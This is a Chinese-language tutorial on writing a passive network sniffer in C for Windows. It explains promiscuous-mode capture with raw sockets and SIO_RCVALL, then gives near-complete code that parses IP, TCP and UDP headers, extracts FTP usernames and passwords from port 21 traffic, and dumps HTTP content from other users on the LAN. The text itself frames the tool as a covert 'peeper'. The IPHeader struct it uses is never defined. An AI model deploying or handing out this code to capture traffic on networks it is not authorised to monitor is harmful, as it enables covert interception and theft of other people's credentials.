嗅探器可以神不知鬼不覺地去獲得局域網(wǎng)中用戶訪問網(wǎng)絡(luò)的數(shù)據(jù)，可謂是隱藏在黑暗中的偷窺者。嗅探技術(shù)可以分為主動(dòng)嗅探和被動(dòng)嗅探。主動(dòng)嗅探主要是依賴ARP欺騙或MAC欺騙誘導(dǎo)被攻擊者將數(shù)據(jù)發(fā)送給攻擊者；被動(dòng)嗅探主要是將網(wǎng)卡設(shè)置為混雜模式，然后接收通過網(wǎng)卡的所有數(shù)據(jù)。本文主要介紹被動(dòng)嗅探的工作方式。

　　1. 嗅探器的編寫思路

　　共享方式下的以太網(wǎng)會(huì)將數(shù)據(jù)發(fā)送給同一網(wǎng)段內(nèi)的所有計(jì)算機(jī)網(wǎng)卡，接收到數(shù)據(jù)的網(wǎng)卡會(huì)將與自己MAC地址不匹配的數(shù)據(jù)丟棄。因?yàn)楣蚕硪蕴W(wǎng)會(huì)將別人的數(shù)據(jù)也發(fā)送給自己計(jì)算機(jī)的網(wǎng)卡，所以嗅探器就是利用共享以太網(wǎng)的原理進(jìn)行嗅探的。網(wǎng)卡可以工作在多種方式下，當(dāng)網(wǎng)卡工作在混雜模式下時(shí)，可接收所有的數(shù)據(jù)而不丟棄。當(dāng)接收到數(shù)據(jù)以后，就需要自己解析IP頭、TCP頭、UDP頭等信息。因此，開發(fā)一個(gè)嗅探器的簡單思路就是改變網(wǎng)卡的工作方式為混雜模式，并解析收到的數(shù)據(jù)包。

　　設(shè)置網(wǎng)卡的工作方式為混雜模式，該功能通過ioctlsocket（）函數(shù)即可改變。代碼如下：

　　// 設(shè)置 SIO_RCVALL 控制代碼，以便接收所有的 IP 包

　　DWORD dwValue = 1;

　　if（ ioctlsocket（sRaw, SIO_RCVALL, &dwValue） != 0 ）

　　{

　　return -1;

　　}

　　SIO_RCVALL定義在mstcpip.h頭文件中，因此要編譯它，必須包含該頭文件及庫文件，代碼如下：

　　#include <mstcpip.h>

　　#pragma comment（lib, “Advapi32.lib”）

　　為了收到數(shù)據(jù)包以便自己解析數(shù)據(jù)包，就要使用原始套接字，而不能單純地使用TCP或UDP套接字。對(duì)于解析數(shù)據(jù)包，必須了解和清楚數(shù)據(jù)包的格式。這里給出TCP和UDP數(shù)據(jù)包的格式，定義如下：

　　typedef struct _TCPHeader // 20 字節(jié)的 TCP 頭

　　{

　　USHORT sourcePort; // 16 位源端口號(hào)

　　USHORT destinationPort; // 16 位目的端口號(hào)

　　ULONG sequenceNumber; // 32 位序列號(hào)

　　ULONG acknowledgeNumber; // 32 位確認(rèn)號(hào)

　　UCHAR dataoffset; // 高 4 位表示數(shù)據(jù)偏移

　　UCHAR flags; // 6 位標(biāo)志位

　　USHORT windows; // 16 位窗口大小

　　USHORT checksum; // 16 位校驗(yàn)和

　　USHORT urgentPointer; // 16 位緊急數(shù)據(jù)偏移量

　　} TCPHeader, *PTCPHeader;

　　typedef struct _UDPHeader

　　{

　　USHORT sourcePort; // 源端口號(hào)

　　USHORT destinationPort; // 目的端口號(hào)

　　USHORT len; // 封包長度

　　USHORT checksum; // 校驗(yàn)和

　　} UDPHeader, *PUDPHeader;

　　2. 嗅探器的實(shí)現(xiàn)代碼

　　有了上面的內(nèi)容，剩下的部分就簡單了。代碼如下：

　　void DecodeTCPPacket（char *pData, char *szSrcIP, char *szDestIp）

　　{

　　TCPHeader *pTCPHdr = （TCPHeader *）pData;

　　printf（“%s:%d -> %s:%d\r\n”,szSrcIP,

　　ntohs（pTCPHdr->sourcePort），szDestIp,

　　ntohs（pTCPHdr->destinationPort））；

　　// 下面還可以根據(jù)目的端口號(hào)進(jìn)一步解析應(yīng)用層協(xié)議

　　switch（：：ntohs（pTCPHdr->destinationPort））

　　{

　　case 21:

　　// 解析 FTP 的用戶名和密碼

　　printf（“FTP========================================\r\n”）；

　　pData = pData + sizeof（TCPHeader）；

　　if （ strncmp（pData, “USER ”, 5） == 0 ）

　　{

　　printf（“Ftp UserName : %s \r\n”, pData + 4）；

　　}

　　if （ strncmp（pData, “PASS ”, 5） == 0 ）

　　{

　　printf（“Ftp Password : %s \r\n”, pData + 4）；

　　}

　　printf（“FTP========================================\r\n”）；

　　break;

　　case 80:

　　case 8080:

　　// 直接輸出瀏覽器獲取到的內(nèi)容

　　printf（“WEB========================================\r\n”）；

　　printf（“%s\r\n”, pData + sizeof（TCPHeader））；

　　printf（“WEB========================================\r\n”）；

　　break;

　　}

　　}

　　void DecodeUDPPacket（char *pData, char *szSrcIP, char *szDestIp）

　　{

　　UDPHeader *pUDPHdr = （UDPHeader *）pData;

　　printf（“%s:%d -> %s:%d\r\n”,szSrcIP,

　　ntohs（pUDPHdr->sourcePort），szDestIp,

　　ntohs（pUDPHdr->destinationPort））；

　　}

　　void DecodeIPPacket（char *pData）

　　{

　　IPHeader *pIPHdr = （IPHeader*）pData;

　　in_addr source, dest;

　　char szSourceIp[32], szDestIp[32];

　　printf（“-------------------------------\r\n”）；

　　// 從 IP 頭中取出源 IP 地址和目的 IP 地址

　　source.S_un.S_addr = pIPHdr->ipSource;

　　dest.S_un.S_addr = pIPHdr->ipDestination;

　　strcpy（szSourceIp, inet_ntoa（source））；

　　strcpy（szDestIp, inet_ntoa（dest））；

　　// IP 頭長度

　　int nHeaderLen = （pIPHdr->iphVerLen & 0xf） * sizeof（ULONG）；

　　switch（ pIPHdr->ipProtocol ）

　　{

　　case IPPROTO_TCP: // TCP 協(xié)議

　　DecodeTCPPacket（pData + nHeaderLen, szSourceIp, szDestIp）；

　　break;

　　case IPPROTO_UDP:

　　DecodeUDPPacket（pData + nHeaderLen, szSourceIp, szDestIp）；

　　break;

　　case IPPROTO_ICMP:

　　break;

　　}

　　}

　　int main（）

　　{

　　WSADATA wsa;

　　WSAStartup（MAKEWORD（2, 2）， &wsa）；

　　// 創(chuàng)建原始套節(jié)字

　　SOCKET sRaw = socket（AF_INET, SOCK_RAW, IPPROTO_IP）；

　　// 獲取本地 IP 地址

　　char szHostName[56];

　　SOCKADDR_IN addr_in;

　　struct hostent *pHost;

　　gethostname（szHostName, 56）；

　　if（ （pHost = gethostbyname（（char*）szHostName）） == NULL ）

　　{

　　return -1;

　　}

　　// 在調(diào)用 ioctl 之前，必須綁定套節(jié)字

　　addr_in.sin_family = AF_INET;

　　addr_in.sin_port = htons（0）；

　　memcpy（&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length）；

　　printf（“Binding to interface : %s \r\n”, ::inet_ntoa（addr_in.sin_addr））；

　　if（ bind（sRaw, （PSOCKADDR）&addr_in, sizeof（addr_in）） == SOCKET_ERROR ）

　　{

　　return -1;

　　}

　　// 設(shè)置 SIO_RCVALL 控制代碼，以便接收所有的 IP 包

　　DWORD dwValue = 1;

　　if（ ioctlsocket（sRaw, SIO_RCVALL, &dwValue） != 0 ）

　　{

　　return -1;

　　}

　　// 開始接收封包

　　char buff[1024];

　　int nRet;

　　while（TRUE）

　　{

　　nRet = recv（sRaw, buff, 1024, 0）；

　　if（ nRet > 0 ）

　　{

　　DecodeIPPacket（buff）；

　　}

　　}

　　closesocket（sRaw）；

　　WSACleanup（）；

　　return 0;

　　}